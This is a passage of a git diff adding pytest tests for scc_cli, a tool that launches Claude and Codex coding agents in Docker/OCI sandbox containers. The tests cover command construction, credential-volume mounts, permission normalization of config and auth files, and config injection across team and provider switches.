proxy_env = { + "HTTP_PROXY": "http://172.18.0.2:3128", + "HTTPS_PROXY": "http://172.18.0.2:3128", + "NO_PROXY": "", + } + cmd = OciSandboxRuntime._build_create_cmd( + spec, + "scc-oci-test", + network_name="scc-egress-scc-oci-test", + proxy_env=proxy_env, + ) + assert "HTTP_PROXY=http://172.18.0.2:3128" in cmd + assert "HTTPS_PROXY=http://172.18.0.2:3128" in cmd + assert "NO_PROXY=" in cmd + + +# ── Container naming ──────────────────────────────────────────────────────── + + +class TestContainerName: + """Verify deterministic container naming.""" + + def test_deterministic(self) -> None: + name1 = _container_name(Path("/home/user/project")) + name2 = _container_name(Path("/home/user/project")) + assert name1 == name2 + assert name1.startswith("scc-oci-") + + def test_different_paths_differ(self) -> None: + assert _container_name(Path("/a")) != _container_name(Path("/b")) + + +# ── S02/T03 — Provider-aware exec command and credential volume mounting ───── + + +class TestProviderAwareExecCmd: + """Verify _build_exec_cmd uses spec.agent_argv when present.""" + + def test_build_exec_cmd_uses_agent_argv_when_present(self) -> None: + """With agent_argv=("codex",), exec cmd uses codex, not claude.""" + spec = _minimal_spec(agent_argv=["codex"]) + cmd = OciSandboxRuntime._build_exec_cmd(spec, "cid123") + assert "codex" in cmd + assert AGENT_NAME not in cmd + assert "--dangerously-skip-permissions" not in cmd + + def test_build_exec_cmd_falls_back_to_agent_name(self) -> None: + """Empty agent_argv uses existing AGENT_NAME + --dangerously-skip-permissions.""" + spec = _minimal_spec(agent_argv=[]) + cmd = OciSandboxRuntime._build_exec_cmd(spec, "cid123") + assert AGENT_NAME in cmd + assert "--dangerously-skip-permissions" in cmd + + def test_build_exec_cmd_default_agent_argv(self) -> None: + """Default SandboxSpec (no agent_argv given) falls back to AGENT_NAME.""" + spec = _minimal_spec() + cmd = OciSandboxRuntime._build_exec_cmd(spec, "cid123") + assert AGENT_NAME in cmd + assert "--dangerously-skip-permissions" in cmd + + def test_build_exec_cmd_continue_session_with_codex_argv(self) -> None: + """-c appended after codex argv when continue_session=True.""" + spec = _minimal_spec(agent_argv=["codex"], continue_session=True) + cmd = OciSandboxRuntime._build_exec_cmd(spec, "cid123") + assert "codex" in cmd + assert "-c" in cmd + # -c should be after codex + codex_idx = cmd.index("codex") + c_idx = cmd.index("-c") + assert c_idx > codex_idx + + def test_build_exec_cmd_continue_session_with_default_argv(self) -> None: + """-c appended after default AGENT_NAME argv when continue_session=True.""" + spec = _minimal_spec(continue_session=True) + cmd = OciSandboxRuntime._build_exec_cmd(spec, "cid123") + assert AGENT_NAME in cmd + assert "--dangerously-skip-permissions" in cmd + assert "-c" in cmd + + +class TestProviderAwareCreateCmd: + """Verify _build_create_cmd uses spec.data_volume and spec.config_dir.""" + + def test_build_create_cmd_uses_data_volume_when_present(self) -> None: + """With data_volume set, volume mount uses it instead of SANDBOX_DATA_VOLUME.""" + spec = _minimal_spec(data_volume="docker-codex-sandbox-data") + cmd = OciSandboxRuntime._build_create_cmd(spec, "scc-oci-test") + mount_str = "docker-codex-sandbox-data:/home/agent/.claude" + assert mount_str in cmd + assert SANDBOX_DATA_VOLUME not in " ".join(cmd) + + def test_build_create_cmd_uses_config_dir_when_present(self) -> None: + """With config_dir set, mount target uses it instead of .claude.""" + spec = _minimal_spec(config_dir=".codex") + cmd = OciSandboxRuntime._build_create_cmd(spec, "scc-oci-test") + mount_found = any("/home/agent/.codex" in arg for arg in cmd) + assert mount_found + + def test_build_create_cmd_both_volume_and_config_dir(self) -> None: + """Both data_volume and config_dir produce the expected mount.""" + spec = _minimal_spec( + data_volume="docker-codex-sandbox-data", + config_dir=".codex", + ) + cmd = OciSandboxRuntime._build_create_cmd(spec, "scc-oci-test") + mount_str = "docker-codex-sandbox-data:/home/agent/.codex" + assert mount_str in cmd + + def test_build_create_cmd_falls_back_to_defaults(self) -> None: + """Empty data_volume and config_dir falls back to SANDBOX_DATA_VOLUME and .claude.""" + spec = _minimal_spec(data_volume="", config_dir="") + cmd = OciSandboxRuntime._build_create_cmd(spec, "scc-oci-test") + mount_str = f"{SANDBOX_DATA_VOLUME}:/home/agent/.claude" + assert mount_str in cmd + + def test_build_create_cmd_default_spec_falls_back(self) -> None: + """Default SandboxSpec (no volume/dir given) uses original constants.""" + spec = _minimal_spec() + cmd = OciSandboxRuntime._build_create_cmd(spec, "scc-oci-test") + mount_str = f"{SANDBOX_DATA_VOLUME}:/home/agent/.claude" + assert mount_str in cmd + + +# ── D041: workspace-scoped config layering ─────────────────────────────────── + + +class TestWorkspaceScopedConfigInjection: + """D041: Codex project-scoped config goes to workspace, Claude stays home-level.""" + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_workspace_scoped_settings_triggers_git_exclude( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """Settings path under workspace mount target triggers mkdir + git exclude.""" + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + # Use /workspace as the mount target — must match _minimal_spec defaults + workspace_target = Path("/workspace") + settings = AgentSettings( + rendered_bytes=b"[sandbox]\nauto_approve = []\n", + path=workspace_target / ".codex" / "config.toml", + suffix=".toml", + ) + spec = _minimal_spec(agent_settings=settings) + runtime.run(spec) + + # Calls: create, start, mkdir (git exclude), grep||echo (git exclude), cp + assert mock_run_docker.call_count >= 4 + all_calls = [call[0][0] for call in mock_run_docker.call_args_list] + # Find the mkdir call + mkdir_calls = [c for c in all_calls if "mkdir" in c] + assert len(mkdir_calls) == 1 + assert f"{workspace_target}/.codex" in " ".join(mkdir_calls[0]) + + # Find the git exclude shell command (filter out D039 normalization) + git_exclude_calls = [ + c for c in all_calls if "sh" in c and "-c" in c and "exclude_path=" in c[-1] + ] + assert len(git_exclude_calls) == 1 + shell_cmd = git_exclude_calls[0][-1] + assert ".codex" in shell_cmd + assert "git -C" in shell_cmd + assert "info/exclude" in shell_cmd + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_home_scoped_settings_skips_git_exclude( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """Settings path under /home/agent (Claude) does NOT trigger git exclude.""" + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + settings = AgentSettings( + rendered_bytes=b'{"permissions": {}}', + path=Path("/home/agent/.claude/settings.json"), + suffix=".json", + ) + spec = _minimal_spec(agent_settings=settings) + runtime.run(spec) + + # 8 calls: ps lookup, create, start, normalize-dir, normalize-auth x2, + # home projection, cp + assert mock_run_docker.call_count == 8 + all_calls = _docker_calls(mock_run_docker) + assert _first_call(mock_run_docker, "create")[0] == "create" + assert _first_call(mock_run_docker, "start") == ["start", "cid123"] + exec_calls = [c for c in all_calls if c[0] == "exec"] + assert len(exec_calls) == 4 + assert _first_call(mock_run_docker, "cp")[0] == "cp" + # No git-exclude calls + git_exclude_calls = [c for c in all_calls if "-c" in c and ".git/info/exclude" in str(c)] + assert len(git_exclude_calls) == 0 + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_workspace_scoped_settings_cp_targets_workspace_path( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """docker cp writes Codex config to workspace path, not /home/agent.""" + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + workspace_target = Path("/workspace") + settings = AgentSettings( + rendered_bytes=b"[sandbox]\nauto_approve = []\n", + path=workspace_target / ".codex" / "config.toml", + suffix=".toml", + ) + spec = _minimal_spec(agent_settings=settings) + runtime.run(spec) + + # Find the cp call (last real docker command before exec) + cp_calls = [call[0][0] for call in mock_run_docker.call_args_list if call[0][0][0] == "cp"] + assert len(cp_calls) == 1 + cp_target = cp_calls[0][2] # "cid123:/workspace/.codex/config.toml" + assert "cid123:" in cp_target + assert str(workspace_target / ".codex" / "config.toml") in cp_target + assert "/home/agent" not in cp_target + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_worktree_workspace_scoped_settings_use_workdir_not_mount_root( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """D041: worktree launches target the logical workspace, not the bind-mount root.""" + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + mount_root = Path("/repo-parent") + workspace_root = mount_root / "worktree-a" + settings = AgentSettings( + rendered_bytes=b'cli_auth_credentials_store = "file"\n', + path=workspace_root / ".codex" / "config.toml", + suffix=".toml", + ) + spec = SandboxSpec( + image="scc-agent-codex:latest", + workspace_mount=MountSpec( + source=Path("/host/repo-parent"), + target=mount_root, + ), + workdir=workspace_root, + agent_settings=settings, + ) + runtime.run(spec) + + all_calls = [call[0][0] for call in mock_run_docker.call_args_list] + mkdir_calls = [c for c in all_calls if "mkdir" in c] + assert len(mkdir_calls) == 1 + assert f"{workspace_root}/.codex" in " ".join(mkdir_calls[0]) + assert str(mount_root / ".codex") not in " ".join(mkdir_calls[0]) + + git_exclude_calls = [c for c in all_calls if "sh" in c and "-c" in c and "git -C" in c[-1]] + assert len(git_exclude_calls) == 1 + shell_cmd = git_exclude_calls[0][-1] + assert f"git -C {workspace_root}" in shell_cmd + assert str(mount_root / ".git") not in shell_cmd + assert ".codex" in shell_cmd + + +# ── D039: Runtime permission normalization ─────────────────────────────────── + + +class TestNormalizeProviderPermissions: + """D039: Verify permission normalization command construction.""" + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_claude_config_dir_chmod_and_chown(self, mock_run: MagicMock) -> None: + """Claude (.claude) config dir gets 0700, uid 1000.""" + _normalize_provider_permissions("cid123", ".claude") + + # First call: chown+chmod the config dir + dir_call = mock_run.call_args_list[0] + dir_cmd: list[str] = dir_call[0][0] + assert dir_cmd[:3] == ["exec", "cid123", "sh"] + shell_str = dir_cmd[-1] + assert f"chown {_AGENT_UID}:{_AGENT_UID} {_AGENT_HOME}/.claude" in shell_str + assert f"chmod 0700 {_AGENT_HOME}/.claude" in shell_str + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_claude_auth_file_chmod(self, mock_run: MagicMock) -> None: + """Claude auth file (.credentials.json) gets 0600 if it exists.""" + _normalize_provider_permissions("cid123", ".claude") + + # Second call: first Claude auth file chmod + assert mock_run.call_count == 3 + auth_call = mock_run.call_args_list[1] + auth_cmd: list[str] = auth_call[0][0] + shell_str = auth_cmd[-1] + assert "test -f" in shell_str + assert ".credentials.json" in shell_str + assert "chmod 0600" in shell_str + assert f"chown {_AGENT_UID}:{_AGENT_UID}" in shell_str + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_codex_config_dir_chmod_and_chown(self, mock_run: MagicMock) -> None: + """Codex (.codex) config dir gets 0700, uid 1000.""" + _normalize_provider_permissions("cid123", ".codex") + + dir_call = mock_run.call_args_list[0] + shell_str = dir_call[0][0][-1] + assert f"chown {_AGENT_UID}:{_AGENT_UID} {_AGENT_HOME}/.codex" in shell_str + assert f"chmod 0700 {_AGENT_HOME}/.codex" in shell_str + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_codex_auth_file_chmod(self, mock_run: MagicMock) -> None: + """Codex auth file (auth.json) gets 0600 if it exists.""" + _normalize_provider_permissions("cid123", ".codex") + + assert mock_run.call_count == 2 + auth_call = mock_run.call_args_list[1] + shell_str = auth_call[0][0][-1] + assert "auth.json" in shell_str + assert "chmod 0600" in shell_str + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_unknown_config_dir_skips_auth_files(self, mock_run: MagicMock) -> None: + """Unknown config dir has no known auth files — only dir chmod runs.""" + _normalize_provider_permissions("cid123", ".future-provider") + + # Only one call — the directory chmod; no auth file calls + assert mock_run.call_count == 1 + shell_str = mock_run.call_args_list[0][0][0][-1] + assert ".future-provider" in shell_str + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_empty_config_dir_defaults_to_claude(self, mock_run: MagicMock) -> None: + """Empty config_dir falls back to .claude (matches _build_create_cmd default).""" + _normalize_provider_permissions("cid123", "") + + dir_call = mock_run.call_args_list[0] + shell_str = dir_call[0][0][-1] + assert f"{_AGENT_HOME}/.claude" in shell_str + # Should also check both Claude auth files + assert mock_run.call_count == 3 + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_check_false_on_all_calls(self, mock_run: MagicMock) -> None: + """All normalization commands are best-effort (check=False).""" + _normalize_provider_permissions("cid123", ".claude") + + for call in mock_run.call_args_list: + assert call[1].get("check") is False + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_auth_files_registry_consistency(self, mock_run: MagicMock) -> None: + """_AUTH_FILES has entries for both known providers.""" + assert ".claude" in _AUTH_FILES + assert ".codex" in _AUTH_FILES + assert ".credentials.json" in _AUTH_FILES[".claude"] + assert ".claude.json" in _AUTH_FILES[".claude"] + assert "auth.json" in _AUTH_FILES[".codex"] + + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_claude_home_level_auth_projection(self, mock_run: MagicMock) -> None: + """Claude auth cache is projected into HOME as /home/agent/.claude.json.""" + _project_home_level_auth_files("cid123", ".claude") + + assert mock_run.call_count == 1 + shell_str = mock_run.call_args_list[0][0][0][-1] + assert f"{_AGENT_HOME}/.claude/.claude.json" in shell_str + assert f"{_AGENT_HOME}/.claude.json" in shell_str + assert "ln -sfn" in shell_str + + def test_home_level_auth_links_registry_consistency(self) -> None: + assert ".claude" in _HOME_LEVEL_AUTH_LINKS + + +class TestNormalizePermissionsIntegration: + """D039: Verify normalization is called in the run() flow.""" + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_normalization_called_in_run_for_claude( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """run() calls normalization between start and settings injection.""" + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + spec = _minimal_spec() # defaults to Claude (empty config_dir) + runtime.run(spec) + + # Calls: create, start, dir-chmod, auth-chmod x2, home projection, exec(via execvp) + all_cmds = _docker_calls(mock_run_docker) + assert _first_call(mock_run_docker, "create")[0] == "create" + assert _first_call(mock_run_docker, "start") == ["start", "cid123"] + exec_calls = [c for c in all_cmds if c[0] == "exec"] + assert len(exec_calls) == 4 + assert "chmod 0700" in exec_calls[0][-1] + assert "chmod 0600" in exec_calls[1][-1] + assert "chmod 0600" in exec_calls[2][-1] + assert "ln -sfn" in exec_calls[3][-1] + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_normalization_called_in_run_for_codex( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """run() calls normalization with Codex config dir.""" + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + spec = _minimal_spec(config_dir=".codex") + runtime.run(spec) + + all_cmds = _docker_calls(mock_run_docker) + exec_calls = [c for c in all_cmds if c[0] == "exec"] + # Dir chmod references .codex + dir_shell = exec_calls[0][-1] + assert ".codex" in dir_shell + assert "chmod 0700" in dir_shell + # Auth chmod references auth.json + auth_shell = exec_calls[1][-1] + assert "auth.json" in auth_shell + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_normalization_before_settings_injection( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """Normalization runs before docker cp (settings injection).""" + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + settings = AgentSettings( + rendered_bytes=b'{"permissions": {}}', + path=Path("/home/agent/.claude/settings.json"), + suffix=".json", + ) + spec = _minimal_spec(agent_settings=settings) + runtime.run(spec) + + all_cmds = [call[0][0] for call in mock_run_docker.call_args_list] + # Find positions: cp must come after normalization exec calls + cp_indices = [i for i, c in enumerate(all_cmds) if c[0] == "cp"] + norm_indices = [i for i, c in enumerate(all_cmds) if c[0] == "exec" and "chmod" in str(c)] + assert len(cp_indices) >= 1 + assert len(norm_indices) >= 1 + assert all(ni < cp_indices[0] for ni in norm_indices) + + +# ── D038/D042: Config persistence model transitions ───────────────────────── + + +class TestConfigPersistenceTransitions: + """D038/D042: Prove config freshness is deterministic across session transitions. + + These tests exercise the OCI runtime's _inject_settings path to verify + that config injection is governed solely by SandboxSpec.agent_settings — + not by prior container state. Each test simulates two sequential launches + (with fresh containers) and asserts the second launch writes the expected + config content, regardless of what the first launch wrote. + """ + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_governed_to_standalone_clears_stale_config( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """Governed→standalone: fresh standalone launch writes empty config. + + Prior launch injected team config. A subsequent fresh standalone + launch writes an empty settings file — clearing any team-specific + config that might persist in the volume. + """ + mock_run_docker.return_value = MagicMock(stdout="cid123\n") + + # ── First launch: governed (team config) ── + team_settings = AgentSettings( + rendered_bytes=b'{"plugins": ["team-plugin"], "mcpServers": {"internal": {}}}', + path=Path("/home/agent/.claude/settings.json"), + suffix=".json", + ) + spec_governed = _minimal_spec(agent_settings=team_settings) + runtime.run(spec_governed) + + # Verify first launch wrote team config + cp_calls_1 = [call for call in mock_run_docker.call_args_list if call[0][0][0] == "cp"] + assert len(cp_calls_1) == 1 + + # ── Reset mocks for second launch ── + mock_run_docker.reset_mock() + mock_execvp.reset_mock() + mock_run_docker.return_value = MagicMock(stdout="cid456\n") + + # ── Second launch: standalone (empty config) ── + empty_settings = AgentSettings( + rendered_bytes=b"{}", + path=Path("/home/agent/.claude/settings.json"), + suffix=".json", + ) + spec_standalone = _minimal_spec(agent_settings=empty_settings) + runtime.run(spec_standalone) + + # Verify second launch wrote empty config via docker cp + cp_calls_2 = [call for call in mock_run_docker.call_args_list if call[0][0][0] == "cp"] + assert len(cp_calls_2) == 1 + # The cp target is the settings path inside the container + cp_target = cp_calls_2[0][0][0][2] + assert "cid456:" in cp_target + assert "/home/agent/.claude/settings.json" in cp_target + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_team_a_to_team_b_replaces_config( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """TeamA→TeamB: fresh launch with team B config replaces team A config. + + Verify the runtime writes the new team's config regardless of + what was in the volume from the prior launch. + """ + mock_run_docker.return_value = MagicMock(stdout="cid-team-a\n") + + # ── First launch: team A ── + team_a_settings = AgentSettings( + rendered_bytes=b'{"plugins": ["team-a-plugin"]}', + path=Path("/home/agent/.claude/settings.json"), + suffix=".json", + ) + spec_a = _minimal_spec(agent_settings=team_a_settings) + runtime.run(spec_a) + + # Verify team A config was injected + cp_calls_a = [call for call in mock_run_docker.call_args_list if call[0][0][0] == "cp"] + assert len(cp_calls_a) == 1 + + # ── Reset mocks for second launch ── + mock_run_docker.reset_mock() + mock_execvp.reset_mock() + mock_run_docker.return_value = MagicMock(stdout="cid-team-b\n") + + # ── Second launch: team B ── + team_b_settings = AgentSettings( + rendered_bytes=b'{"plugins": ["team-b-plugin"], "mcpServers": {"gis": {}}}', + path=Path("/home/agent/.claude/settings.json"), + suffix=".json", + ) + spec_b = _minimal_spec(agent_settings=team_b_settings) + runtime.run(spec_b) + + # Verify team B config was injected (not team A) + cp_calls_b = [call for call in mock_run_docker.call_args_list if call[0][0][0] == "cp"] + assert len(cp_calls_b) == 1 + cp_target_b = cp_calls_b[0][0][0][2] + assert "cid-team-b:" in cp_target_b + assert "/home/agent/.claude/settings.json" in cp_target_b + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_resume_skips_injection_entirely( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """Resume: agent_settings=None means no docker cp at all. + + The application layer sets agent_settings=None for resume (D038). + The runtime should not issue any docker cp command. + """ + mock_run_docker.return_value = MagicMock(stdout="cid-resume\n") + + spec_resume = _minimal_spec(agent_settings=None) + runtime.run(spec_resume) + + all_cmds = [call[0][0] for call in mock_run_docker.call_args_list] + cp_cmds = [c for c in all_cmds if c[0] == "cp"] + assert len(cp_cmds) == 0 + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_settings_to_no_settings_still_injects_empty( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """Settings→no-settings: empty config file is still written. + + Even when the rendered config is an empty dict `{}`, the runtime + must issue the docker cp to overwrite any stale config from a + prior launch. This is the "always writes" guarantee from D038. + """ + mock_run_docker.return_value = MagicMock(stdout="cid-fresh\n") + + # First launch: real settings + real_settings = AgentSettings( + rendered_bytes=b'{"plugins": ["some-plugin"]}', + path=Path("/home/agent/.claude/settings.json"), + suffix=".json", + ) + spec_real = _minimal_spec(agent_settings=real_settings) + runtime.run(spec_real) + + mock_run_docker.reset_mock() + mock_execvp.reset_mock() + mock_run_docker.return_value = MagicMock(stdout="cid-empty\n") + + # Second launch: empty settings (D038 always-writes semantics) + empty_settings = AgentSettings( + rendered_bytes=b"{}", + path=Path("/home/agent/.claude/settings.json"), + suffix=".json", + ) + spec_empty = _minimal_spec(agent_settings=empty_settings) + runtime.run(spec_empty) + + # docker cp was still called + cp_cmds = [call[0][0] for call in mock_run_docker.call_args_list if call[0][0][0] == "cp"] + assert len(cp_cmds) == 1 + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_codex_team_transition_workspace_scoped( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """TeamA→TeamB for Codex: workspace-scoped config is replaced correctly. + + Codex settings go to workspace mount, not /home/agent. Verify the + transition writes to the correct workspace-scoped path. + """ + mock_run_docker.return_value = MagicMock(stdout="cid-cx-a\n") + workspace_target = Path("/workspace") + + # ── First launch: Codex team A ── + codex_a_settings = AgentSettings( + rendered_bytes=b'model = "o3"\ncli_auth_credentials_store = "file"\n', + path=workspace_target / ".codex" / "config.toml", + suffix=".toml", + ) + spec_cx_a = _minimal_spec(agent_settings=codex_a_settings) + runtime.run(spec_cx_a) + + mock_run_docker.reset_mock() + mock_execvp.reset_mock() + mock_run_docker.return_value = MagicMock(stdout="cid-cx-b\n") + + # ── Second launch: Codex team B ── + codex_b_settings = AgentSettings( + rendered_bytes=b'model = "o4-mini"\ncli_auth_credentials_store = "file"\n', + path=workspace_target / ".codex" / "config.toml", + suffix=".toml", + ) + spec_cx_b = _minimal_spec(agent_settings=codex_b_settings) + runtime.run(spec_cx_b) + + # Verify the cp command targets the workspace-scoped Codex path + cp_calls = [call[0][0] for call in mock_run_docker.call_args_list if call[0][0][0] == "cp"] + assert len(cp_calls) == 1 + cp_target = cp_calls[0][2] + assert "cid-cx-b:" in cp_target + assert str(workspace_target / ".codex" / "config.toml") in cp_target + assert "/home/agent" not in cp_target + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_claude_to_codex_provider_switch_writes_correct_path( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """Cross-provider transition: Claude→Codex writes to correct target. + + Each provider has its own settings path and scope. A switch from + Claude (home-scoped) to Codex (workspace-scoped) should write to + the Codex path, not the Claude path. + """ + mock_run_docker.return_value = MagicMock(stdout="cid-claude\n") + workspace_target = Path("/workspace") + + # ── First launch: Claude ── + claude_settings = AgentSettings( + rendered_bytes=b'{"permissions": {}}', + path=Path("/home/agent/.claude/settings.json"), + suffix=".json", + ) + spec_claude = _minimal_spec(agent_settings=claude_settings) + runtime.run(spec_claude) + + mock_run_docker.reset_mock() + mock_execvp.reset_mock() + mock_run_docker.return_value = MagicMock(stdout="cid-codex\n") + + # ── Second launch: Codex ── + codex_settings = AgentSettings( + rendered_bytes=b'cli_auth_credentials_store = "file"\n', + path=workspace_target / ".codex" / "config.toml", + suffix=".toml", + ) + spec_codex = _minimal_spec(agent_settings=codex_settings) + runtime.run(spec_codex) + + # Verify Codex config targets workspace, not /home/agent + cp_calls = [call[0][0] for call in mock_run_docker.call_args_list if call[0][0][0] == "cp"] + assert len(cp_calls) == 1 + cp_target = cp_calls[0][2] + assert "cid-codex:" in cp_target + assert str(workspace_target / ".codex" / "config.toml") in cp_target + # Must NOT write to Claude's path + assert ".claude" not in cp_target + + @patch("scc_cli.adapters.oci_sandbox_runtime.os.execvp") + @patch("scc_cli.adapters.oci_sandbox_runtime._run_docker") + def test_injection_idempotent_same_config_twice( + self, mock_run_docker: MagicMock, mock_execvp: MagicMock, runtime: OciSandboxRuntime + ) -> None: + """Idempotency: writing the same config twice is safe and deterministic. + + Two sequential fresh launches with identical settings should both + issue docker cp with the same content — the runtime does not skip + based on "config hasn't changed." + """ + mock_run_docker.return_value = MagicMock(stdout="cid-1\n") + settings = AgentSettings( + rendered_bytes=b'{"plugins": ["fixed-plugin"]}', + path=Path("/home/agent/.claude/settings.json"), + suffix=".json", + ) + spec = _minimal_spec(agent_settings=settings) + runtime.run(spec) + + cp_count_1 = sum(1 for call in mock_run_docker.call_args_list if call[0][0][0] == "cp") + assert cp_count_1 == 1 + + mock_run_docker.reset_mock() + mock_execvp.reset_mock() + mock_run_docker.return_value = MagicMock(stdout="cid-2\n") + + # Same settings, second launch + runtime.run(spec) + cp_count_2 = sum(1 for call in mock_run_docker.call_args_list if call[0][0][0] == "cp") + assert cp_count_2 == 1 diff --git a/tests/test_personal_profiles.py b/tests/test_personal_profiles.py index 113f550..ef64925 100644 --- a/tests/test_personal_profiles.py +++ b/tests/test_personal_profiles.py @@ -3,7 +3,7 @@ from pathlib import Path from scc_cli.core import personal_profiles -from scc_cli.marketplace.managed import ManagedState, save_managed_state +from scc_cli.marketplace.managed import ManagedState, load_managed_state, save_managed_state def _write_json(path: Path, data: dict) -> None: @@ -55,7 +55,9 @@ def test_merge_personal_settings_respects_managed(tmp_path: Path) -> None: existing = {"enabledPlugins": {"team@market": True, "user@market": True}} personal = {"enabledPlugins": {"team@market": False, "new@market": True}} - merged = personal_profiles.merge_personal_settings(tmp_path, existing, personal) + merged = personal_profiles.merge_personal_settings( + tmp_path, existing, personal, managed_state_loader=load_managed_state + ) assert merged["enabledPlugins"]["team@market"] is False assert merged["enabledPlugins"]["user@market"] is True diff --git a/tests/test_personal_profiles_characterization.py b/tests/test_personal_profiles_characterization.py new file mode 100644 index 0000000..f201282 --- /dev/null +++ b/tests/test_personal_profiles_characterization.py @@ -0,0 +1,259 @@ +"""Characterization tests for core/personal_profiles.py. + +These tests capture the current behavior of the personal profiles module +before S02 surgery decomposes it. They protect against accidental behavior +changes during the split. + +Target: src/scc_cli/core/personal_profiles.py (839 lines, 7 existing tests) +""" + +from __future__ import annotations + +import json +from pathlib import Path + +import pytest + +from scc_cli.core import personal_profiles + + +def _write_json(path: Path, data: dict) -> None: + """Helper to write JSON to a path, creating parent dirs.""" + path.parent.mkdir(parents=True, exist_ok=True) + path.write_text(json.dumps(data, indent=2)) + + +# ═══════════════════��═══════════════════════════��═══════════════════════════════ +# Profile CRUD — Create +# ══════════════════════════════════════════════��═══════════════════════════��════ + + +class TestSavePersonalProfile: + """Characterize save_personal_profile behavior.""" + + def test_save_creates_profile_file( + self, monkeypatch: pytest.MonkeyPatch, tmp_path: Path + ) -> None: + """Saving a profile creates a JSON file in the personal projects dir.""" + monkeypatch.setattr(personal_profiles, "_get_remote_url", lambda _: None) + monkeypatch.setattr( + personal_profiles, "get_personal_projects_dir", lambda: tmp_path / "personal" + ) + + profile = personal_profiles.save_personal_profile( + tmp_path / "workspace", + {"enabledPlugins": {"p@m": True}}, + {"mcpServers": {}}, + ) + assert profile.path.exists() + data = json.loads(profile.path.read_text()) + assert data["version"] == personal_profiles.PROFILE_VERSION + assert data["settings"]["enabledPlugins"]["p@m"] is True + assert data["mcp"] == {"mcpServers": {}} + + def test_save_with_none_settings_stores_empty_dicts( + self, monkeypatch: pytest.MonkeyPatch, tmp_path: Path + ) -> None: + """Saving with None settings and mcp still stores empty dicts (not None).""" + monkeypatch.setattr(personal_profiles, "_get_remote_url", lambda _: None) + monkeypatch.setattr( + personal_profiles, "get_personal_projects_dir", lambda: tmp_path / "personal" + ) + + profile = personal_profiles.save_personal_profile(tmp_path / "ws", None, None) + data = json.loads(profile.path.read_text()) + assert data["settings"] == {} + assert data["mcp"] == {} + + def test_save_overwrites_existing_profile( + self, monkeypatch: pytest.MonkeyPatch, tmp_path: Path + ) -> None: + """Saving a profile for the same workspace overwrites the previous one.""" + monkeypatch.setattr(personal_profiles, "_get_remote_url", lambda _: None) + monkeypatch.setattr( + personal_profiles, "get_personal_projects_dir", lambda: tmp_path / "personal" + ) + + ws = tmp_path / "workspace" + personal_profiles.save_personal_profile(ws, {"old": True}, None) + profile = personal_profiles.save_personal_profile(ws, {"new": True}, None) + data = json.loads(profile.path.read_text()) + assert data["settings"] == {"new": True} + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Profile CRUD — Read +# ════════════════════════════════════════════════════════════════════════��══════ + + +class TestLoadPersonalProfile: + """Characterize 